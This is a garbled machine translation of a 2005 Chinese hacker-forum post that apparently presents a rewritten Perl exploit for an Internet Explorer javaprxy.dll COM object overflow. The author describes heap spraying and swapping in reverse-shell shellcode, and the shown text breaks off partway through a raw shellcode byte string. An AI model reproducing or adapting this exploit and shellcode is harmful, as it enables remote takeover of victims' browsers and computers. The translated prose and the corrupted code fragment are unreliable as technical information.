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iejavaprxy.dllcomobject漏洞利用程序改写手记(Iejavaprxy.dllcomobject exploits rewrite notes)
iejavaprxy.dllcomobject漏洞利用程序改写手记(Iejavaprxy.dllcomobject exploits rewrite notes)
[original]IEjavaprxy.dllCOMObject exploits rewrite notes
Article title: [original]IEjavaprxy.dllCOMObject exploits the top notes of the most lonely invincible rewrite published: 2005-07-0721:46 [[original landlord]IEjavaprxy.dllCOMObject exploits rewrite notes
Article author: Invincible most lonely [E.S.T]
Source: Evil octal information security team ()
MicrosoftInternetExplorerjavaprxy.dllCOMObject overflow vulnerability was released just two days ago, and I have also sent a similar vulnerability. The principle of this loophole, I do not say much, in short, is a hole in the IE. The use of vulnerability still uses violence to expand memory, and I modify it here mainly for shellcode.
Local monitoring of the shellcode is not worth much, or reverse, more comfortable. But this shellcode modification is not so easy, so in order to prevent shellcode from being encoded by Unicode, a little bit of action is needed.
I have written the entire program, as follows, fully Perl code:
# /usr/bin/perl!
My$reverse_shell= \xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA
The \xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x9
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